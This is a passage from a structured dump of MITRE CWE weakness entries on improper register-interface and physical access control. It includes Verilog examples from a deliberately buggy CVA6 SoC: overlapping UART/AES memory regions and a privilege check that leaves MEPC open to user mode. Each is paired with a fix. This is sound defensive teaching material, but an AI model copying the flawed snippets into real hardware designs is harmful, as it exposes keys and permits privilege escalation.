"ExampleCode": "Ensure that software accesses to memory regions are only permitted if all three filters permit access. Additionally, the scheme could define a memory region priority to ensure that Region_2 (the memory region defined by Non_privileged_SW) cannot overlap Region_0 or Region_1 (which are used by Privileged_SW).",
"IntroText": null,
"Language": null,
"Nature": "Good",
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The example code below is taken from the IOMMU controller module of the HACK@DAC'19 buggy CVA6 SoC [REF-1338]. The static memory map is composed of a set of Memory-Mapped Input/Output (MMIO) regions covering different IP agents within the SoC. Each region is defined by two 64-bit variables representing the base address and size of the memory region (XXXBase and XXXLength).",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "In this example, we have 12 IP agents, and only 4 of them are called out for illustration purposes in the code snippets. Access to the AES IP MMIO region is considered privileged as it provides access to AES secret key, internal states, or decrypted data.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t... \n\t\t localparam logic[63:0] PLICLength = 64'h03FF_FFFF;\n```\nlocalparam logic[63:0] UARTLength = 64'h0011_1000;** \n\t\t\n\t\t **localparam logic[63:0] AESLength = 64'h0000_1000;** \n\t\t localparam logic[63:0] SPILength = 64'h0080_0000;\n\t\t\n\t```\n\t\t...\n\t\t typedef enum logic [63:0] {\n\t\t\t ...\n\t\t\t PLICBase = 64'h0C00_0000,\n```\nUARTBase = 64'h1000_0000,** \n\t\t\t\n\t\t\t **AESBase = 64'h1010_0000,** \n\t\t\t SPIBase = 64'h2000_0000,\n\t\t\t ...",
"IntroText": null,
"Language": "Verilog",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "The vulnerable code allows the overlap between the protected MMIO region of the AES peripheral and the unprotected UART MMIO region. As a result, unprivileged users can access the protected region of the AES IP. In the given vulnerable example UART MMIO region starts at address 64'h1000_0000 and ends at address 64'h1011_1000 (UARTBase is 64'h1000_0000, and the size of the region is provided by the UARTLength of 64'h0011_1000).",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "On the other hand, the AES MMIO region starts at address 64'h1010_0000 and ends at address 64'h1010_1000, which implies an overlap between the two peripherals' memory regions. Thus, any user with access to the UART can read or write the AES MMIO region, e.g., the AES secret key.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "To mitigate this issue, remove the overlapping address regions by decreasing the size of the UART memory region or adjusting memory bases for all the remaining peripherals. [REF-1339]",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\t... \n\t\t localparam logic[63:0] PLICLength = 64'h03FF_FFFF;\n```\nlocalparam logic[63:0] UARTLength = 64'h0000_1000;** \n\t\t localparam logic[63:0] AESLength = 64'h0000_1000;\n\t\t localparam logic[63:0] SPILength = 64'h0080_0000;\n\t\t\n\t```\n\t\t...\n\t\t typedef enum logic [63:0] {\n\t\t\t ...\n\t\t\t PLICBase = 64'h0C00_0000,\n\t\t\t UARTBase = 64'h1000_0000,\n\t\t\t AESBase = 64'h1010_0000,\n\t\t\t SPIBase = 64'h2000_0000,\n\t\t\t ...\n```",
"IntroText": null,
"Language": "Verilog",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1260"
]
] |
[] |
1262
|
Improper Access Control for Register Interface
|
Base
|
Simple
|
Stable
|
The product uses memory-mapped I/O registers that act as an interface to hardware functionality from software, but there is improper access control to those registers.
|
Software commonly accesses peripherals in a System-on-Chip (SoC) or other device through a memory-mapped register interface. Malicious software could tamper with any security-critical hardware data that is accessible directly or indirectly through the register interface, which could lead to a loss of confidentiality and integrity.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "This weakness may be exploited if the register interface design does not adequately protect hardware assets from software.",
"Phase": "Architecture and Design"
},
{
"Note": "Mis-implementation of access control policies may inadvertently allow access to hardware assets through the register interface.",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Read Memory",
"Read Application Data",
"Modify Memory",
"Modify Application Data",
"Gain Privileges or Assume Identity",
"Bypass Protection Mechanism",
"Unexpected State",
"Alter Execution Logic"
],
"Likelihood": null,
"Note": "Confidentiality of hardware assets may be violated if the protected information can be read out by software through the register interface. Registers storing security state, settings, other security-critical data may be corruptible by software without correctly implemented protections.",
"Scope": [
"Confidentiality",
"Integrity"
]
}
] |
[
{
"Description": "Design proper policies for hardware register access from software.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "Ensure that access control policies for register access are implemented in accordance with the specified design.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] |
[
{
"Description": "virtualization product does not restrict access to debug and other processor registers in the hardware, allowing a crash of the host or guest OS",
"Link": "https://www.cve.org/CVERecord?id=CVE-2014-2915",
"Reference": "CVE-2014-2915"
},
{
"Description": "virtual interrupt controller in a virtualization product allows crash of host by writing a certain invalid value to a register, which triggers a fatal error instead of returning an error code",
"Link": "https://www.cve.org/CVERecord?id=CVE-2021-3011",
"Reference": "CVE-2021-3011"
},
{
"Description": "Driver exposes access to Model Specific Register (MSR) registers, allowing admin privileges.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2020-12446",
"Reference": "CVE-2020-12446"
},
{
"Description": "Virtualization product does not restrict access to PCI command registers, allowing host crash from the guest.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2015-2150",
"Reference": "CVE-2015-2150"
}
] | null | null |
[
"680"
] |
[
{
"Authors": null,
"Edition": null,
"ExternalReferenceID": "REF-1340",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2019",
"Publisher": null,
"Section": null,
"Title": "Hackatdac19 csr_regfile.sv",
"URL": "https://github.com/HACK-EVENT/hackatdac19/blob/619e9fb0ef32ee1e01ad76b8732a156572c65700/src/csr_regfile.sv#L854:L857",
"URLDate": "2023-06-21"
},
{
"Authors": [
"Andrew Waterman",
"Yunsup Lee",
"Rimas Avižienis",
"David Patterson",
"Krste Asanović"
],
"Edition": "Volume II: Privileged Architecture",
"ExternalReferenceID": "REF-1341",
"Publication": null,
"PublicationDay": "04",
"PublicationMonth": "11",
"PublicationYear": "2016",
"Publisher": null,
"Section": null,
"Title": "The RISC-V Instruction Set Manual",
"URL": "https://people.eecs.berkeley.edu/~krste/papers/riscv-privileged-v1.9.1.pdf",
"URLDate": "2023-06-21"
},
{
"Authors": [
"Florian Zaruba",
"Michael Schaffner",
"Andreas Traber"
],
"Edition": null,
"ExternalReferenceID": "REF-1345",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": "2019",
"Publisher": null,
"Section": null,
"Title": "csr_regfile.sv",
"URL": "https://github.com/openhwgroup/cva6/blob/7951802a0147aedb21e8f2f6dc1e1e9c4ee857a2/src/csr_regfile.sv#L868:L871",
"URLDate": "2023-06-21"
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-05-08",
"SubmissionName": "Nicole Fern",
"SubmissionOrganization": "Cycuity (originally submitted as Tortuga Logic)",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.1",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Detection_Factors, Name, Observed_Examples, Potential_Mitigations, Weakness_Ordinalities",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Mapping_Notes, References",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "Provided detection methods and observed examples",
"ContributionDate": "2021-10-11",
"ContributionName": "Anders Nordstrom, Alric Althoff",
"ContributionOrganization": "Cycuity (originally submitted as Tortuga Logic)",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "Provided detection methods",
"ContributionDate": "2021-10-12",
"ContributionName": "Nicole Fern",
"ContributionOrganization": "Riscure",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "suggested demonstrative example",
"ContributionDate": "2023-06-21",
"ContributionName": "Shaza Zeitouni, Mohamadreza Rostami, Pouya Mahmoody, Ahmad-Reza Sadeghi",
"ContributionOrganization": "Technical University of Darmstadt",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": "suggested demonstrative example",
"ContributionDate": "2023-06-21",
"ContributionName": "Rahul Kande, Chen Chen, Jeyavijayan Rajendran",
"ContributionOrganization": "Texas A&M University",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2021-10-28",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Register Interface Allows Software Access to Sensitive Data or Security Settings",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] |
[
{
"Description": null,
"Ordinality": "Primary"
}
] |
[
{
"Description": "This is applicable in the Architecture phase before implementation started. Make sure access policy is specified for the entire memory map. Manual analysis may not ensure the implementation is correct.",
"DetectionMethodID": null,
"Effectiveness": "Moderate",
"EffectivenessNotes": null,
"Method": "Manual Analysis"
},
{
"Description": "Registers controlling hardware should have access control implemented. This access control may be checked manually for correct implementation. Items to check consist of how are trusted parties set, how are trusted parties verified, how are accesses verified, etc. Effectiveness of a manual analysis will vary depending upon how complicated the interface is constructed.",
"DetectionMethodID": null,
"Effectiveness": "Moderate",
"EffectivenessNotes": null,
"Method": "Manual Analysis"
},
{
"Description": "Functional simulation is applicable during the Implementation Phase. Testcases must be created and executed for memory mapped registers to verify adherence to the access control policy. This method can be effective, since functional verification needs to be performed on the design, and verification for this weakness will be included. There can be difficulty covering the entire memory space during the test.",
"DetectionMethodID": null,
"Effectiveness": "Moderate",
"EffectivenessNotes": null,
"Method": "Simulation / Emulation"
},
{
"Description": "Formal verification is applicable during the Implementation phase. Assertions need to be created in order to capture illegal register access scenarios and prove that they cannot occur. Formal methods are exhaustive and can be very effective, but creating the cases for large designs may be complex and difficult.",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Formal Verification"
},
{
"Description": "Information flow tracking can be applicable during the Implementation phase. Security sensitive data (assets) - for example, as stored in registers - is automatically tracked over time through the design to verify the data doesn't reach illegal destinations that violate the access policies for the memory map. This method can be very effective when used together with simulation and emulation, since detecting violations doesn't rely on specific scenarios or data values. This method does rely on simulation and emulation, so testcases must exist in order to use this method.",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Analysis"
},
{
"Description": "Manual documentation review of the system memory map, register specification, and permissions associated with accessing security-relevant functionality exposed via memory-mapped registers.",
"DetectionMethodID": null,
"Effectiveness": "Moderate",
"EffectivenessNotes": null,
"Method": "Architecture or Design Review"
},
{
"Description": "Perform penetration testing (either manual or semi-automated with fuzzing) to verify that access control mechanisms such as the memory protection units or on-chip bus firewall settings adequately protect critical hardware registers from software access.",
"DetectionMethodID": null,
"Effectiveness": "Moderate",
"EffectivenessNotes": null,
"Method": "Fuzzing"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The register interface provides software access to hardware functionality. This functionality is an attack surface. This attack surface may be used to run untrusted code on the system through the register interface. As an example, cryptographic accelerators require a mechanism for software to select modes of operation and to provide plaintext or ciphertext data to be encrypted or decrypted as well as other functions. This functionality is commonly provided through registers.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "Cryptographic key material stored in registers inside the cryptographic accelerator can be accessed by software.",
"IntroText": null,
"Language": null,
"Nature": "Bad",
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "Key material stored in registers should never be accessible to software. Even if software can provide a key, all read-back paths to software should be disabled.",
"IntroText": null,
"Language": null,
"Nature": "Good",
"Reference": null
}
],
"ID": null
},
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The example code is taken from the Control/Status Register (CSR) module inside the processor core of the HACK@DAC'19 buggy CVA6 SoC [REF-1340]. In RISC-V ISA [REF-1341], the CSR file contains different sets of registers with different privilege levels, e.g., user mode (U), supervisor mode (S), hypervisor mode (H), machine mode (M), and debug mode (D), with different read-write policies, read-only (RO) and read-write (RW). For example, machine mode, which is the highest privilege mode in a RISC-V system, registers should not be accessible in user, supervisor, or hypervisor modes.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tif (csr_we || csr_read) begin \n```\nif ((riscv::priv_lvl_t'(priv_lvl_o & csr_addr.csr_decode.priv_lvl) != csr_addr.csr_decode.priv_lvl) && !(csr_addr.address==riscv::CSR_MEPC)) begin** \n\t\t\n\t\t```\n\t\t\t csr_exception_o.cause = riscv::ILLEGAL_INSTR;\n\t\t\t csr_exception_o.valid = 1'b1;\n\t\t end\n\t\t // check access to debug mode only CSRs\n\t\t if (csr_addr_i[11:4] == 8'h7b && !debug_mode_q) begin\n\t\t\t csr_exception_o.cause = riscv::ILLEGAL_INSTR;\n\t\t\t csr_exception_o.valid = 1'b1;\n\t\t end \n\t end \n```",
"IntroText": null,
"Language": "Verilog",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "The vulnerable example code allows the machine exception program counter (MEPC) register to be accessed from a user mode program by excluding the MEPC from the access control check. MEPC as per the RISC-V specification can be only written or read by machine mode code. Thus, the attacker in the user mode can run code in machine mode privilege (privilege escalation).",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "To mitigate the issue, fix the privilege check so that it throws an Illegal Instruction Exception for user mode accesses to the MEPC register. [REF-1345]",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tif (csr_we || csr_read) begin \n```\nif ((riscv::priv_lvl_t'(priv_lvl_o & csr_addr.csr_decode.priv_lvl) != csr_addr.csr_decode.priv_lvl)) begin** \n\t\t\n\t\t```\n\t\t\t csr_exception_o.cause = riscv::ILLEGAL_INSTR;\n\t\t\t csr_exception_o.valid = 1'b1;\n\t\t end\n\t\t // check access to debug mode only CSRs\n\t\t if (csr_addr_i[11:4] == 8'h7b && !debug_mode_q) begin\n\t\t\t csr_exception_o.cause = riscv::ILLEGAL_INSTR;\n\t\t\t csr_exception_o.valid = 1'b1;\n\t\t end \n\t end \n```",
"IntroText": null,
"Language": "Verilog",
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1262"
]
] |
[] |
1263
|
Improper Physical Access Control
|
Class
|
Simple
|
Incomplete
|
The product is designed with access restricted to certain information, but it does not sufficiently protect against an unauthorized actor with physical access to these areas.
|
Sections of a product intended to have restricted access may be inadvertently or intentionally rendered accessible when the implemented physical protections are insufficient. The specific requirements around how robust the design of the physical protection mechanism needs to be depends on the type of product being protected. Selecting the correct physical protection mechanism and properly enforcing it through implementation and manufacturing are critical to the overall physical security of the product.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": "This weakness can arise if design decisions are made that do not align with the intended physical protection of the product",
"Phase": "Architecture and Design"
},
{
"Note": "While the architecture and design phase of the product may have accurately met the intended robustness for product physical protections, this phase may introduce the weakness through errors in physically manufacturing the product.",
"Phase": "Manufacturing"
}
] |
[
{
"Impact": [
"Varies by Context"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Access Control"
]
}
] |
[
{
"Description": "Specific protection requirements depend strongly on contextual factors including the level of acceptable risk associated with compromise to the product's protection mechanism. Designers could incorporate anti-tampering measures that protect against or detect when the product has been tampered with.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "The testing phase of the lifecycle should establish a method for determining whether the protection mechanism is sufficient to prevent unauthorized access.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Testing"
],
"Strategy": null
},
{
"Description": "Ensure that all protection mechanisms are fully activated at the time of manufacturing and distribution.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Manufacturing"
],
"Strategy": null
}
] | null | null | null |
[
"401"
] | null |
[
{
"Note": "This entry is still under development and will continue to see updates and content improvements.",
"Type": "Maintenance"
}
] |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-05-28",
"SubmissionName": "CWE Content Team",
"SubmissionOrganization": "MITRE",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.1",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2020-12-10",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes, Relationships",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2020-08-20",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Insufficient Physical Protection Mechanism",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed-with-Review
|
This CWE entry is a Class and might have Base-level children that would be more appropriate
|
Examine children of this entry to see if there is a better fit
|
[
"Abstraction"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "1191",
"Nature": "PeerOf",
"Ordinal": null,
"ViewID": "1000"
}
] | null | null | null | null | null | null | null | 1
|
[
[
"284",
"1263"
]
] |
[
"1243"
] |
1243
|
Sensitive Non-Volatile Information Not Protected During Debug
|
Base
|
Simple
|
Incomplete
|
Access to security-sensitive information stored in fuses is not limited during debug.
|
